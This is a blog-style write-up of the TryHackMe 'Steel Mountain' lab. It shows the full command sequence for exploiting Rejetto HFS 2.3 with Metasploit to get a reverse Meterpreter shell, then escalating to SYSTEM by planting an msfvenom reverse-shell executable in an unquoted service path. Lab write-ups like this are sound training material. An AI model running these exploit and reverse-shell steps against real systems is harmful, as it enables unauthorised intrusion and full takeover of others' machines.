<!DOCTYPE html><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>TryHackMe writeup: Steel Mountain</title><style>
      * {
        font-family: Georgia, Cambria, "Times New Roman", Times, serif;
      }
      html, body {
        margin: 0;
        padding: 0;
      }
      h1 {
        font-size: 50px;
        margin-bottom: 17px;
        color: #333;
      }
      h2 {
        font-size: 24px;
        line-height: 1.6;
        margin: 30px 0 0 0;
        margin-bottom: 18px;
        margin-top: 33px;
        color: #333;
      }
      h3 {
        font-size: 30px;
        margin: 10px 0 20px 0;
        color: #333;
      }
      header {
        width: 640px;
        margin: auto;
      }
      section {
        width: 640px;
        margin: auto;
      }
      section p {
        margin-bottom: 27px;
        font-size: 20px;
        line-height: 1.6;
        color: #333;
      }
      section img {
        max-width: 640px;
      }
      footer {
        padding: 0 20px;
        margin: 50px 0;
        text-align: center;
        font-size: 12px;
      }
      .aspectRatioPlaceholder {
        max-width: auto !important;
        max-height: auto !important;
      }
      .aspectRatioPlaceholder-fill {
        padding-bottom: 0 !important;
      }
      header,
      section[data-field=subtitle],
      section[data-field=description] {
        display: none;
      }
      </style></head><body><article class="h-entry">
<header>
<h1 class="p-name">TryHackMe writeup: Steel Mountain</h1>
</header>
<section data-field="subtitle" class="p-summary">
Steel Mountain is a TryHackMe room that sports a Mr. Robot theme. It is great for those into hacking shows an new to the scene!
</section>
<section data-field="body" class="e-content">
<section name="f60c" class="section section--body section--first"><div class="section-divider"><hr class="section-divider"></div><div class="section-content"><div class="section-inner sectionLayout--insetColumn"><h3 name="8045" id="8045" class="graf graf--h3 graf--leading graf--title">TryHackMe writeup: Steel Mountain</h3><p name="9022" id="9022" class="graf graf--p graf-after--h3">Steel Mountain (<a href="https://tryhackme.com/room/steelmountain" data-href="https://tryhackme.com/room/steelmountain" class="markup--anchor markup--p-anchor" rel="noopener" target="_blank">“tryhackme”, 2019</a>) is a <em class="markup--em markup--p-em">TryHackMe VIP room</em> that sports a <em class="markup--em markup--p-em">Mr. Robot</em> theme. It is fairly rudimentary and is meant to give junior penetration testers and even “complete beginners” some experience in hacking into a Windows-based boot2root virtual machine. I was able to do the bits that involved Metasploit — but <strong class="markup--strong markup--p-strong">not</strong> the task involving manual exploitation (<a href="https://tryhackme.com/room/steelmountain" data-href="https://tryhackme.com/room/steelmountain" class="markup--anchor markup--p-anchor" rel="noopener" target="_blank">Ibid, task 4</a>). In this article, I will discuss my procedure of obtaining root privileges on the boot2root system.</p><figure name="8f48" id="8f48" class="graf graf--figure graf-after--p"><img class="graf-image" data-image-id="1*kSUXqzlj-A4wSysE1gOniA.png" data-width="808" data-height="625" data-is-featured="true" src="https://cdn-images-1.medium.com/max/800/1*kSUXqzlj-A4wSysE1gOniA.png"><figcaption class="imageCaption">Base Image: <a href="https://wiki.teamfortress.com/wiki/Thunder_Mountain" data-href="https://wiki.teamfortress.com/wiki/Thunder_Mountain" class="markup--anchor markup--figure-anchor" rel="noopener" target="_blank">Team Fortress 2 Wiki (n.d.)</a> and <a href="https://telltaletv.com/2019/11/preview-mr-robot-season-4-episode-5-method-not-allowed/mr-robot-season-4-59/" data-href="https://telltaletv.com/2019/11/preview-mr-robot-season-4-episode-5-method-not-allowed/mr-robot-season-4-59/" class="markup--anchor markup--figure-anchor" rel="noopener" target="_blank">Gilstorf (2019)</a></figcaption></figure><h3 name="e4d0" id="e4d0" class="graf graf--h3 graf-after--figure">Procedure</h3><h4 name="905d" id="905d" class="graf graf--h4 graf-after--h3">Initial probing</h4><p name="e5f1" id="e5f1" class="graf graf--p graf-after--h4">As with TryHackMe boot2root machines, I started by hitting that green coloured “Start Machine” button to get the virtual machine booted up, and waited about five minutes. The first task that the lab asked was “[w]ho is the employee of the month?” This led me to assume that the boot2root machine was running some kind of web server on port 80. So, I casually browsed the website and came across this:</p><figure name="bb52" id="bb52" class="graf graf--figure graf-after--p"><img class="graf-image" data-image-id="1*811RYqkdTN1ckKzc6bA8eQ.png" data-width="770" data-height="607" src="https://cdn-images-1.medium.com/max/800/1*811RYqkdTN1ckKzc6bA8eQ.png"><figcaption class="imageCaption">The homepage of “Steel Mountain”</figcaption></figure><p name="9048" id="9048" class="graf graf--p graf-after--figure graf--trailing">The name of the “employee of the month” was rather easy to work out: it literally was in the filename of the source image file. It can be discovered, specifically on Firefox, by right clicking on the image and selecting “[c]opy image link.”</p></div></div></section><section name="207c" class="section section--body"><div class="section-divider"><hr class="section-divider"></div><div class="section-content"><div class="section-inner sectionLayout--insetColumn"><p name="33ac" id="33ac" class="graf graf--p graf--leading">I then moved onto more technical aspects of probing, starting with the obligatory <em class="markup--em markup--p-em">nmap</em> scanning with the following flags:</p><p name="8e65" id="8e65" class="graf graf--p graf-after--p"><code class="markup--code markup--p-code">nmap -sT -A -v &lt;boot2root ip&gt; -Pn -p- -O -sC -oX tcp_scan.xml</code></p><p name="d570" id="d570" class="graf graf--p graf-after--p">The room mentioned that the boot2root virtual machine is running Windows, which means that it does not respond to pings by default. So, I used the <code class="markup--code markup--p-code">-Pn</code> flag to have <em class="markup--em markup--p-em">nmap</em> scan the boot2root VM with host discovery disabled — bypassing this limitation in the process.</p><p name="0698" id="0698" class="graf graf--p graf-after--p">Looking through the <em class="markup--em markup--p-em">nmap</em> output, the boot2root VM is running an interesting service:</p><pre name="ae25" id="ae25" class="graf graf--pre graf-after--p">8080/tcp open http HttpFileServer httpd 2.3<br>|_http-title: HFS /<br>|_http-favicon: Unknown favicon MD5: 759792EDD4EF8E6BC2D1877D27153CB1<br>|_http-server-header: HFS 2.3<br>| http-methods: <br>|_   Supported Methods: GET HEAD POST</pre><p name="66ff" id="66ff" class="graf graf--p graf-after--pre">The <code class="markup--code markup--p-code">HttpFileServer httpd 2.3</code> version information is referring to the Rejetto HTTP File Server (<a href="http://rejetto.com/hfs/" data-href="http://rejetto.com/hfs/" class="markup--anchor markup--p-anchor" rel="noopener" target="_blank">Rejetto.com, n.d.</a>) — referencing obviously the 2.3 release. As I shall demonstrate in the next subsection, this service vulnerable to a remote command execution vulnerability.</p><h4 name="92c2" id="92c2" class="graf graf--h4 graf-after--p">Exploitation</h4><p name="1318" id="1318" class="graf graf--p graf-after--h4">My next step is to fire up the Metasploit Framework…</p><pre name="61e1" id="61e1" class="graf graf--pre graf-after--p"><strong class="markup--strong markup--pre-strong">└─$ sudo msfconsole</strong></pre><pre name="9a21" id="9a21" class="graf graf--pre graf-after--pre">[... snip ...]</pre><pre name="1653" id="1653" class="graf graf--pre graf-after--pre">=[ metasploit v6.1.26-dev ]<br>+ — — =[ 2194 exploits — 1162 auxiliary — 400 post ]<br>+ — — =[ 596 payloads — 45 encoders — 10 nops ]<br>+ — — =[ 9 evasion ]</pre><pre name="16fc" id="16fc" class="graf graf--pre graf-after--pre">Metasploit tip: Search can apply complex filters such as <br>search cve:2009 type:exploit, see all the filters <br>with help search</pre><pre name="313f" id="313f" class="graf graf--pre graf-after--pre"><strong class="markup--strong markup--pre-strong">msf6 &gt; </strong></pre><p name="61e0" id="61e0" class="graf graf--p graf-after--pre">… and then configure and launch the exploit:</p><pre name="61b1" id="61b1" class="graf graf--pre graf-after--p"><strong class="markup--strong markup--pre-strong">msf6 &gt;</strong> <strong class="markup--strong markup--pre-strong">use exploit/windows/http/rejetto_hfs_exec</strong><br>[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp<br><strong class="markup--strong markup--pre-strong">msf6 exploit(windows/http/rejetto_hfs_exec) &gt;</strong> <strong class="markup--strong markup--pre-strong">set PAYLOAD windows/x64/meterpreter/reverse_tcp<br></strong>PAYLOAD =&gt; windows/x64/meterpreter/reverse_tcp<br><strong class="markup--strong markup--pre-strong">msf6 exploit(windows/http/rejetto_hfs_exec) &gt;</strong> <strong class="markup--strong markup--pre-strong">set RHOSTS &lt;boot2root ip&gt;</strong><br>RHOSTS =&gt; &lt;boot2root ip&gt;<br><strong class="markup--strong markup--pre-strong">msf6 exploit(windows/http/rejetto_hfs_exec) &gt;</strong> <strong class="markup--strong markup--pre-strong">set RPORT 8080</strong><br>RPORT =&gt; 8080<br><strong class="markup--strong markup--pre-strong">msf6 exploit(windows/http/rejetto_hfs_exec) &gt;</strong> <strong class="markup--strong markup--pre-strong">set LHOST &lt;attackbox ip&gt;</strong><br>LHOST =&gt; &lt;attackbox ip&gt;<br><strong class="markup--strong markup--pre-strong">msf6 exploit(windows/http/rejetto_hfs_exec)</strong> &gt; <strong class="markup--strong markup--pre-strong">set SRVHOST &lt;attackbox ip&gt;</strong><br>SRVHOST =&gt; &lt;attackbox ip&gt;<br><strong class="markup--strong markup--pre-strong">msf6 exploit(windows/http/rejetto_hfs_exec) &gt;</strong> <strong class="markup--strong markup--pre-strong">exploit</strong></pre><pre name="ea71" id="ea71" class="graf graf--pre graf-after--pre">[*] Started reverse TCP handler on &lt;attackbox ip&gt;:4444 <br>[*] Using URL: http://&lt;attackbox ip&gt;:8080/EFTPYjGK3Xe<br>[*] Server started.<br>[*] Sending a malicious request to /<br>[*] Payload request received: /EFTPYjGK3Xe<br>[*] Sending stage (175174 bytes) to &lt;boot2root ip&gt;<br>[*] Meterpreter session 1 opened (&lt;attackbox ip&gt;:4444 -&gt; &lt;boot2root ip&gt;:49322 ) at [redacted]</pre><pre name="e967" id="e967" class="graf graf--pre graf-after--pre"><strong class="markup--strong markup--pre-strong">meterpreter &gt;</strong></pre><p name="e263" id="e263" class="graf graf--p graf-after--pre">Now I can proceed to get the flag. I started by listing the current directory that I was in (Cmd. 1) and then moving onto the current user’s account folder (Cmd. 2). Then, I searched for files with a <code class="markup--code markup--p-code">.txt</code> extension (Cmd. 3) and found an interesting file with the full path as: <code class="markup--code markup--p-code">c:\Users\bill\Desktop\user.txt</code>. Finally, I just dumped the text file for the flag (Cmd. 4).</p><pre name="f5a7" id="f5a7" class="graf graf--pre graf-after--p"><strong class="markup--strong markup--pre-strong">[1] meterpreter &gt;</strong> <strong class="markup--strong markup--pre-strong">pwd</strong><br>C:\Users\bill\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup<br><strong class="markup--strong markup--pre-strong">[2] meterpreter &gt;</strong> <strong class="markup--strong markup--pre-strong">cd C:\\Users\\bill<br>[3] meterpreter &gt;</strong> <strong class="markup--strong markup--pre-strong">search -f *.txt</strong><br>Found 59 results...<br>===================<br>Path    Size (bytes)     Modified (UTC)                                                                                                                                                          <br>----    ------------     --------------                                                                                               <br>c:\Program Files (x86)\IObit\Advanced SystemCare\Display_log.txt                                                                                                    586           [redacted] -0500<br>c:\Program Files (x86)\IObit\Advanced SystemCare\Update History.txt                                                                                                 8386          2016-07-27 17:09:38 -0400<br>[... snip ...]<br>c:\Users\bill\Desktop\user.txt                                                                                                                                      70            2019-09-27 08:42:38 -0400<br>[... snip ...]<br><strong class="markup--strong markup--pre-strong">[4] meterpreter &gt; cat C:\\Users\\bill\\Desktop\\user.txt</strong><br>[redacted]</pre><h4 name="cc62" id="cc62" class="graf graf--h4 graf-after--pre">Post-exploitation</h4><p name="e8a6" id="e8a6" class="graf graf--p graf-after--h4">With a shell to a remote computer, I can proceed to work on more “interesting” activities regarding it, such as backdooring and looting it. But before I can do that, I need to have administrator or even SYSTEM privileges.</p><p name="d6a2" id="d6a2" class="graf graf--p graf-after--p">Unfortunately, I do not have such privileges yet:</p><pre name="0ce2" id="0ce2" class="graf graf--pre graf-after--p"><strong class="markup--strong markup--pre-strong">meterpreter &gt; getuid</strong><br>Server username: STEELMOUNTAIN\bill</pre><p name="6ba5" id="6ba5" class="graf graf--p graf-after--pre">To escalate privileges, I will use the <em class="markup--em markup--p-em">PowerUp</em> script developed by <a href="https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1" data-href="https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1" class="markup--anchor markup--p-anchor" rel="noopener" target="_blank">“PowerShellMafia” (2017)</a> to enumerate the system. I downloaded it to my AttackBox and then uploaded it to the boot2root machine:</p><pre name="f22b" id="f22b" class="graf graf--pre graf-after--p"><strong class="markup--strong markup--pre-strong">meterpreter &gt; upload ~/steelmountain/PowerUp.ps1</strong> .<br>[*] uploading : ~/steelmountain/PowerUp.ps1 -&gt; .<br>[*] uploaded : ~/steelmountain/PowerUp.ps1 -&gt; .\PowerUp.ps1<br><strong class="markup--strong markup--pre-strong">meterpreter &gt; pwd</strong><br>C:\Users\bill\Desktop<br><strong class="markup--strong markup--pre-strong">meterpreter &gt; ls</strong><br>Listing: C:\Users\bill\Desktop<br>==============================</pre><pre name="3b27" id="3b27" class="graf graf--pre graf-after--pre">Mode   Size   Type   Last modified   Name<br>----   ----   ----   --------------  ----<br>100666/rw-rw-rw- 600580 fil [redacted] -0500 PowerUp.ps1<br>100666/rw-rw-rw- 282 fil 2019–09–27 07:07:07 -0400 desktop.ini<br>100666/rw-rw-rw- 70 fil 2019–09–27 08:42:38 -0400 user.txt</pre><p name="d8b3" id="d8b3" class="graf graf--p graf-after--pre">Now, I proceeded to enumerate the system with the <em class="markup--em markup--p-em">PowerUp</em> script:</p><pre name="9d60" id="9d60" class="graf graf--pre graf-after--p"><strong class="markup--strong markup--pre-strong">[1] meterpreter &gt; load powershell</strong><br>Loading extension powershell… Success.<br><strong class="markup--strong markup--pre-strong">[2] meterpreter &gt; powershell_shell</strong><br><strong class="markup--strong markup--pre-strong">[3] PS &gt; pwd</strong></pre><pre name="7d4d" id="7d4d" class="graf graf--pre graf-after--pre">Path<br>----<br>C:\Users\bill\Desktop</pre><pre name="adf2" id="adf2" class="graf graf--pre graf-after--pre"><strong class="markup--strong markup--pre-strong">[4] PS &gt; . .\PowerUp.ps1</strong><br><strong class="markup--strong markup--pre-strong">[5] PS &gt; Invoke-AllChecks</strong></pre><pre name="46d3" id="46d3" class="graf graf--pre graf-after--pre">ServiceName           : AdvancedSystemCareService9<br>Path                  : C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe<br>ModifiablePath        : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=AppendData/AddSubdirectory}<br>StartName             : LocalSystem<br>AbuseFunction         : Write-ServiceBinary -Name &#39;AdvancedSystemCareService9&#39; -Path &lt;HijackPath&gt;<br>CanRestart            : True<br>Name                  : AdvancedSystemCareService9<br>Check                 : Unquoted Service Paths</pre><pre name="5a42" id="5a42" class="graf graf--pre graf-after--pre">[… snip …]</pre><p name="9417" id="9417" class="graf graf--p graf-after--pre graf--trailing">I started by loading Meterpreter’s <code class="markup--code markup--p-code">powershell</code> extension (Cmd. 1), enter into a PowerShell environment (Cmd. 2) and just wanted to make sure that I was in <code class="markup--code markup--p-code">bill</code>’s Desktop folder (Cmd. 3). Then, I loaded the functionality from the <em class="markup--em markup--p-em">PowerUp</em> script (Cmd. 4) and proceeded to enumerate the services in the system (Cmd. 5).</p></div></div></section><section name="78b1" class="section section--body"><div class="section-divider"><hr class="section-divider"></div><div class="section-content"><div class="section-inner sectionLayout--insetColumn"><p name="23b1" id="23b1" class="graf graf--p graf--leading">I noticed that the <code class="markup--code markup--p-code">AdvancedSystemCareService9</code> service had the <code class="markup--code markup--p-code">CanRestart</code> configuration set to True and also showed up as having an <em class="markup--em markup--p-em">unquoted service path vulnerability</em>. I am not familiar with this kind of vulnerability, so I looked it up and came across a guide (<a href="https://www.hackingarticles.in/windows-privilege-escalation-unquoted-service-path/" data-href="https://www.hackingarticles.in/windows-privilege-escalation-unquoted-service-path/" class="markup--anchor markup--p-anchor" rel="noopener" target="_blank">Chandel, 2021</a>) discussing how to exploit it.</p><p name="eed9" id="eed9" class="graf graf--p graf-after--p">It turns out that the generic <em class="markup--em markup--p-em">unquoted service path vulnerability</em> is fairly easy to exploit; it is pretty similiar to DLL Search Order Hijacking (<a href="https://attack.mitre.org/techniques/T1574/001/" data-href="https://attack.mitre.org/techniques/T1574/001/" class="markup--anchor markup--p-anchor" rel="noopener" target="_blank">ATT&amp;CK Framework, n.d.</a>). The basic idea is that the Windows API assumes that service executable file paths do not contain any spaces (<a href="https://attack.mitre.org/techniques/T1574/001/" data-href="https://attack.mitre.org/techniques/T1574/001/" class="markup--anchor markup--p-anchor" rel="noopener" target="_blank">Chandel, 2021</a>). If there are file spaces, it is possible to “game” the search order of loading the service executable and load a payload instead of the intended service (<a href="https://attack.mitre.org/techniques/T1574/001/" data-href="https://attack.mitre.org/techniques/T1574/001/" class="markup--anchor markup--p-anchor" rel="noopener" target="_blank">Ibid</a>).</p><p name="1ec5" id="1ec5" class="graf graf--p graf-after--p">To demonstrate this, I will use <code class="markup--code markup--p-code">msfvenom</code> to generate a reverse Meterpreter session:</p><pre name="a626" id="a626" class="graf graf--pre graf-after--p"><strong class="markup--strong markup--pre-strong">└─$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=&lt;attackbox ip&gt; LPORT=4445 -f exe -o Advanced.exe</strong><br>[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload<br>[-] No arch selected, selecting arch: x64 from the payload<br>No encoder specified, outputting raw payload<br>Payload size: 510 bytes<br>Final size of exe file: 7168 bytes<br>Saved as: Advanced.exe</pre><p name="7716" id="7716" class="graf graf--p graf-after--pre">Uploaded it to the proper path:</p><pre name="34ca" id="34ca" class="graf graf--pre graf-after--p"><strong class="markup--strong markup--pre-strong">meterpreter &gt; upload ~/steelmountain/Advanced.exe “C:\\Program Files (x86)\\IObit\\Advanced.exe”</strong><br>[*] uploading : ~/steelmountain/Advanced.exe -&gt; C:\Program Files (x86)\IObit\Advanced.exe<br>[*] Uploaded 7.00 KiB of 7.00 KiB (100.0%): ~/steelmountain/Advanced.exe -&gt; C:\Program Files (x86)\IObit\Advanced.exe<br>[*] uploaded : ~/steelmountain/Advanced.exe -&gt; C:\Program Files (x86)\IObit\Advanced.exe</pre><p name="3932" id="3932" class="graf graf--p graf-after--pre">Then opened up another Metasploit session to listen for the Meterpreter session phoning home:</p><pre name="c11a" id="c11a" class="graf graf--pre graf-after--p"><strong class="markup--strong markup--pre-strong">msf6 &gt; use exploit/multi/handler</strong><br>[*] Using configured payload generic/shell_reverse_tcp<br><strong class="markup--strong markup--pre-strong">msf6 exploit(multi/handler) &gt; set PAYLOAD windows/x64/meterpreter/reverse_tcp</strong><br>PAYLOAD =&gt; windows/x64/meterpreter/reverse_tcp<br><strong class="markup--strong markup--pre-strong">msf6 exploit(multi/handler) &gt; set LHOST &lt;attackbox ip&gt;</strong><br>LHOST =&gt; &lt;attackbox ip&gt;<br><strong class="markup--strong markup--pre-strong">msf6 exploit(multi/handler) &gt; set LPORT 4445</strong><br>LPORT =&gt; 4445<br><strong class="markup--strong markup--pre-strong">msf6 exploit(multi/handler) &gt; exploit</strong></pre><pre name="c525" id="c525" class="graf graf--pre graf-after--pre">[*] Started reverse TCP handler on &lt;attackbox ip&gt;:4445</pre><p name="a8f7" id="a8f7" class="graf graf--p graf-after--pre">And finally, restart the <code class="markup--code markup--p-code">AdvancedSystemCareService9</code> service:</p><pre name="d943" id="d943" class="graf graf--pre graf-after--p"><strong class="markup--strong markup--pre-strong">meterpreter &gt; shell</strong><br>Process 812 created.<br>Channel 7 created.<br>Microsoft Windows [Version 6.3.9600]<br>© 2013 Microsoft Corporation. All rights reserved.</pre><pre name="6ad2" id="6ad2" class="graf graf--pre graf-after--pre"><strong class="markup--strong markup--pre-strong">C:\Users\bill\Desktop&gt;net stop AdvancedSystemCareService9</strong><br>net stop AdvancedSystemCareService9<br>.<br>The Advanced SystemCare Service 9 service was stopped successfully.</pre><pre name="48a2" id="48a2" class="graf graf--pre graf-after--pre"><strong class="markup--strong markup--pre-strong">C:\Users\bill\Desktop&gt;net start AdvancedSystemCareService9</strong><br>net start AdvancedSystemCareService9</pre><p name="26a3" id="26a3" class="graf graf--p graf-after--pre">I got a reverse Meterpreter session and full privileges (Cmd. 1) but quickly had to migrate to a more stable process (Cmd. 2).</p><pre name="67df" id="67df" class="graf graf--pre graf-after--p">[*] Started reverse TCP handler on &lt;attackbox ip&gt;:4445 <br>[*] Sending stage (200262 bytes) to &lt;boot2root ip&gt;<br>[*] Meterpreter session 3 opened (&lt;attackbox ip&gt;:4445 -&gt; &lt;boot2root ip&gt;:49516 ) at [redacted] -0500</pre><pre name="7552" id="7552" class="graf graf--pre graf-after--pre"><strong class="markup--strong markup--pre-strong">[1] meterpreter &gt; getuid</strong><br>Server username: NT AUTHORITY\SYSTEM<br><strong class="markup--strong markup--pre-strong">[2] meterpreter &gt; migrate 2068</strong><br>[*] Migrating from 3292 to 2068…<br>[*] Migration completed successfully.</pre><p name="7069" id="7069" class="graf graf--p graf-after--pre">And I can finally search for the root flag and proceed to dump it:</p><pre name="bb12" id="bb12" class="graf graf--pre graf-after--p"><strong class="markup--strong markup--pre-strong">meterpreter &gt; search -f root.txt</strong><br>Found 1 result…<br>=================</pre><pre name="cb61" id="cb61" class="graf graf--pre graf-after--pre">Path Size (bytes)    Modified (UTC)<br>-----------------    --------------<br>c:\Users\Administrator\Desktop\root.txt 32 2019–09–27 08:41:10 -0400</pre><pre name="0a53" id="0a53" class="graf graf--pre graf-after--pre"><strong class="markup--strong markup--pre-strong">meterpreter &gt; cat &quot;c:\Users\Administrator\Desktop\root.txt&quot;</strong><br>[redacted]<strong class="markup--strong markup--pre-strong">meterpreter &gt;</strong></pre><h3 name="cc3d" id="cc3d" class="graf graf--h3 graf-after--pre">Conclusion</h3><p name="98b9" id="98b9" class="graf graf--p graf-after--h3">The Steel Mountain room also has a task asking the contender to hack into the boot2root VM <em class="markup--em markup--p-em">without</em> Metasploit (<a href="https://tryhackme.com/room/steelmountain" data-href="https://tryhackme.com/room/steelmountain" class="markup--anchor markup--p-anchor" rel="noopener" target="_blank">“tryhackme”, 2019, task 4</a>). I did not do this yet, but will plan to in the not too distant future ;-)</p><p name="6d27" id="6d27" class="graf graf--p graf-after--p">I still wanted to do this writeup to hopefully act as a resource for those interested in getting into offensive security and for reference.</p><h3 name="cd1c" id="cd1c" class="graf graf--h3 graf-after--p">References</h3><p name="3398" id="3398" class="graf graf--p graf-after--h3">ATT&amp;CK Framework (n.d.). <em class="markup--em markup--p-em">Hijack Execution Flow: DLL Search Order Hijacking</em>. Mitre Corporation. Retrieved from Mar. 9, 2022 from: <a href="https://attack.mitre.org/techniques/T1574/001/" data-href="https://attack.mitre.org/techniques/T1574/001/" class="markup--anchor markup--p-anchor" rel="nofollow noopener noopener" target="_blank">https://attack.mitre.org/techniques/T1574/001/</a></p><p name="56b5" id="56b5" class="graf graf--p graf-after--p">Chandel, R. (2021). <em class="markup--em markup--p-em">Windows Privilege Escalation: Unquoted Service Path</em>. Hacking Articles. Retrieved on Mar. 9, 2022 from: <a href="https://www.hackingarticles.in/windows-privilege-escalation-unquoted-service-path/" data-href="https://www.hackingarticles.in/windows-privilege-escalation-unquoted-service-path/" class="markup--anchor markup--p-anchor" rel="nofollow noopener" target="_blank">https://www.hackingarticles.in/windows-privilege-escalation-unquoted-service-path/</a></p><p name="80f0" id="80f0" class="graf graf--p graf-after--p">Gilstorf, A. (2019). <em class="markup--em markup--p-em">Mr. Robot Season 4 Episode 6 — Carly Chaikin as Darlene Alderson, Rami Malek as Elliot Alderson</em>. Tell-Tale TV. Retrieved on Mar. 6 2022 from: <a href="https://telltaletv.com/2019/11/preview-mr-robot-season-4-episode-5-method-not-allowed/mr-robot-season-4-59/" data-href="https://telltaletv.com/2019/11/preview-mr-robot-season-4-episode-5-method-not-allowed/mr-robot-season-4-59/" class="markup--anchor markup--p-anchor" rel="nofollow noopener" target="_blank">https://telltaletv.com/2019/11/preview-mr-robot-season-4-episode-5-method-not-allowed/mr-robot-season-4-59/</a></p><p name="a6cf" id="a6cf" class="graf graf--p graf--startsWithDoubleQuote graf-after--p">“PowerShellMafia” (2017). <em class="markup--em markup--p-em">PowerSploit/PowerUp.ps1</em>. GitHub Repository. Retrieved on Mar. 9, 2022 from: <a href="https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1" data-href="https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1" class="markup--anchor markup--p-anchor" rel="nofollow noopener" target="_blank">https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1</a></p><p name="2294" id="2294" class="graf graf--p graf-after--p">Rejetto.com (n.d.). <em class="markup--em markup--p-em">HFS ~ HTTP File Server</em>. Retrieved on Mar. 9, 2022 from: <a href="http://rejetto.com/hfs/" data-href="http://rejetto.com/hfs/" class="markup--anchor markup--p-anchor" rel="nofollow noopener noopener" target="_blank">http://rejetto.com/hfs/</a></p><p name="4e7b" id="4e7b" class="graf graf--p graf-after--p">Team Fortress 2 Wiki (n.d.). <em class="markup--em markup--p-em">Thunder Mountain</em>. Retrieved on Mar. 9, 2022 from: <a href="https://wiki.teamfortress.com/wiki/Thunder_Mountain" data-href="https://wiki.teamfortress.com/wiki/Thunder_Mountain" class="markup--anchor markup--p-anchor" rel="nofollow noopener" target="_blank">https://wiki.teamfortress.com/wiki/Thunder_Mountain</a></p><p name="1f59" id="1f59" class="graf graf--p graf--startsWithDoubleQuote graf-after--p graf--trailing">“tryhackme” (2019). <em class="markup--em markup--p-em">Steel Mountain</em>. TryHackMe. Retrieved on Mar. 9, 2022 from: <a href="https://tryhackme.com/room/steelmountain" data-href="https://tryhackme.com/room/steelmountain" class="markup--anchor markup--p-anchor" rel="nofollow noopener" target="_blank">https://tryhackme.com/room/steelmountain</a></p></div></div></section><section name="65a7" class="section section--body section--last"><div class="section-divider"><hr class="section-divider"></div><div class="section-content"><div class="section-inner sectionLayout--insetColumn"><p name="5d90" id="5d90" class="graf graf--p graf--leading">The Infosec Writeups team just completed our first Virtual Cybersecurity Conference and Networking event. We had 16 amazing speakers who conducted super valuable and inspiring sessions. To check the list of speakers and topics, <a href="https://iwcon.live." data-href="https://iwcon.live." class="markup--anchor markup--p-anchor" rel="noopener" target="_blank">click here.</a></p><div name="59c4" id="59c4" class="graf graf--mixtapeEmbed graf-after--p graf--trailing"><a href="https://iwcon.live/" data-href="https://iwcon.live/" class="markup--anchor markup--mixtapeEmbed-anchor" title="https://iwcon.live/"><strong class="markup--strong markup--mixtapeEmbed-strong">IWCon2022 — Infosec WriteUps Virtual Conference</strong><br><em class="markup--em markup--mixtapeEmbed-em">Network With World’s Best Infosec Professionals. Find How Cybersecurity Pros Achieved Success. Add New Skills to Your…</em>iwcon.live</a><a href="https://iwcon.live/" class="js-mixtapeImage mixtapeImage u-ignoreBlock" data-media-id="5d040835b75194a969ab6ed6377a19dc" data-thumbnail-img-id="0*baOh1gdEjvbgFIBG" style="background-image: url(https://cdn-images-1.medium.com/fit/c/160/160/0*baOh1gdEjvbgFIBG);"></a></div></div></div></section>
</section>
<footer><p>By <a href="https://medium.com/@EpsilonCalculus" class="p-author h-card">Aleksey</a> on <a href="https://medium.com/p/d052141f8901"><time class="dt-published" datetime="2022-03-11T05:45:52.169Z">March 11, 2022</time></a>.</p><p><a href="https://medium.com/@EpsilonCalculus/tryhackme-writeup-steel-mountain-d052141f8901" class="p-canonical">Canonical link</a></p><p>Exported from <a href="https://medium.com">Medium</a> on June 14, 2022.</p></footer></article></body></html>